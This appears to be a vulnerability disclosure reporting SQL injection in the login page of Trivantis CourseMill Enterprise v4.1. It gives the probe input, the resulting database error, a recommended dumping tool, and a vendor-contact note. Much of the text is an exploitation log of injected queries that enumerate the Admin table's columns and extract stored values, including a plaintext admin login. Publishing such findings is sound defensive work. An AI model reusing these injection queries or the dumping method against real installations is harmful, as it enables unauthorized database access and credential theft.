+==================================================================================================+
sasquatch of SecureState - [email protected]
The username field on the login page is susceptible to SQL injection…
http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.
Impact: Full data dump of underlying database —> Username/Passwords ~~~> ???
username: '
password: test
An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.
This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx
The logins are unencrypted and stored in the "Admin" table. Column names are: ID, LastLogin, OrgId, Passsword.
This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible.
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)
"Trivantis and CourseMill are registered trademarks of Trivantis"
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin…
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin
Etc…
and proceeds to dump the entire database…